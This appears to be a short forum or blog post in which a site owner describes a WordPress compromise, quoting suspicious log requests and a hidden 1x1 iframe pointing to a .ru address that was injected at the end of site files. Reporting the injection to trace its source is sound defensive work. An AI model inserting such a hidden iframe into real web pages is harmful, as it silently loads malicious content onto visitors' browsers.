I’m getting errors in my log file with “sadeferxaa” in the url request:
Page Requested: /index.php?page=sadeferxaa
Browser Signature: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
WordPress was also compromised with the following data injected at the end of some files:
<html><body><iframe src=”http://eftpsid0342943.ru/contacts/s3″ width=1 height=1></iframe></body></html>
I’m trying to track down the source of the compromise, please comment if you have a similar experience with this.